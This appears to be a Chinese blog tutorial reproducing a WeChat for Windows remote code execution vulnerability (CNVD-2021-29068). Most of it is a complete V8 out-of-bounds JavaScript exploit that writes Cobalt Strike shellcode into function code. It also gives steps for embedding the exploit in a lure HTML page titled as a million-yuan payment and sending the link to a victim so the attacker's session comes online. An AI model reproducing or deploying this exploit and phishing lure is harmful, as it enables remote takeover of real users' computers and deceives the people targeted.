首页 漏洞复现

微信windows版存在远程代码执行漏洞

CNVD编号:CNVD-2021-29068
影响产品:深圳市腾讯计算机系统有限公司 微信windows版 <3.2.1.141
防护措施:
1.更新补丁
2.不随意点击恶意链接
3.复现用到的-0-工具Cs(懂得都懂哈)、js脚本、html、下面咱们开始吧,达咩 达咩 达咩呦 达咩达咩呦


一、如何配置CobaltStrike服务端就不多说了,使用CobaltStrike,创建监听
vx0day-1

二、生成payload,获取c为后缀的payload
vx0day-2

三、打开生成的payload文件将里面的 替换为 ,0
vx0day-3

四、js代码如下↓
ps:建议替换下符号可能会出现中文符号,记得将生成的payload中的代码复制进js里面哈
ENABLE_LOG = true;

IN_WORKER = true;

// run calc and hang in a loop

var shellcode = [HI!粘贴我到这里];

function print(data) {

}

var not_optimised_out = 0;

var target_function = (function (value) {

if (value == 0xdecaf0) {

not_optimised_out += 1;

}

not_optimised_out += 1;

not_optimised_out |= 0xff;

not_optimised_out *= 12;

});

for (var i = 0; i < 0x10000; ++i) {

target_function(i);

}

var g_array;

var tDerivedNCount = 17 * 87481 – 8;

var tDerivedNDepth = 19 * 19;

function cb(flag) {

if (flag == true) {

return;

}

g_array = new Array(0);

g_array[0] = 0x1dbabe * 2;

return ‘c01db33f’;

}

function gc() {

for (var i = 0; i < 0x10000; ++i) {

new String();

}

}

function oobAccess() {

var this_ = this;

this.buffer = null;

this.buffer_view = null;

this.page_buffer = null;

this.page_view = null;

this.prevent_opt = [];

var kSlotOffset = 0x1f;

var kBackingStoreOffset = 0xf;

class LeakArrayBuffer extends ArrayBuffer {

constructor() {

super(0x1000);

this.slot = this;

}

}

this.page_buffer = new LeakArrayBuffer();

this.page_view = new DataView(this.page_buffer);

new RegExp({ toString: function () { return ‘a’ } });

cb(true);

class DerivedBase extends RegExp {

constructor() {

// var array = null;

super(

// at this point, the 4-byte allocation for the JSRegExp this object

// has just happened.

{

toString: cb

}, ‘g’

// now the runtime JSRegExp constructor is called, corrupting the

// JSArray.

);

// this allocation will now directly follow the FixedArray allocation

// made for this.data, which is where array.elements points to.

this_.buffer = new ArrayBuffer(0x80);

g_array[8] = this_.page_buffer;

}

}

// try{

var derived_n = eval(`(function derived_n(i) {

if (i == 0) {

return DerivedBase;

}

class DerivedN extends derived_n(i-1) {

constructor() {

super();

return;

${“this.a=0;”.repeat(tDerivedNCount)}

}

}

return DerivedN;

})`);

gc();

new (derived_n(tDerivedNDepth))();

this.buffer_view = new DataView(this.buffer);

this.leakPtr = function (obj) {

this.page_buffer.slot = obj;

return this.buffer_view.getUint32(kSlotOffset, true, …this.prevent_opt);

}

this.setPtr = function (addr) {

this.buffer_view.setUint32(kBackingStoreOffset, addr, true, …this.prevent_opt);

}

this.read32 = function (addr) {

this.setPtr(addr);

return this.page_view.getUint32(0, true, …this.prevent_opt);

}

this.write32 = function (addr, value) {

this.setPtr(addr);

this.page_view.setUint32(0, value, true, …this.prevent_opt);

}

this.write8 = function (addr, value) {

this.setPtr(addr);

this.page_view.setUint8(0, value, …this.prevent_opt);

}

this.setBytes = function (addr, content) {

for (var i = 0; i < content.length; i++) {

this.write8(addr + i, content[i]);

}

}

return this;

}

function trigger() {

var oob = oobAccess();

var func_ptr = oob.leakPtr(target_function);

print(‘[*] target_function at 0x’ + func_ptr.toString(16));

var kCodeInsOffset = 0x1b;

var code_addr = oob.read32(func_ptr + kCodeInsOffset);

print(‘[*] code_addr at 0x’ + code_addr.toString(16));

oob.setBytes(code_addr, shellcode);

target_function(0);

}

try{

print(“start running”);

trigger();

}catch(e){

print(e);

}
vx0day-4

五、将js文件内的内容复制粘贴到html文件中,方便网页访问。
<head>

<meta http-equiv=”Content-Type” content=”text/html;charset=utf-8″>

</head>

<h1>微信到账一百万元</h1>

<script>

我要js代码

我要js代码

我要js代码

</script>
六、现在你可以讲html链接发给幸运儿啦-0-这里俺就用我女朋友作为实验对象了
vx0day-5

七、受害者点击,兄弟萌上线!
vx0day-6




文章评论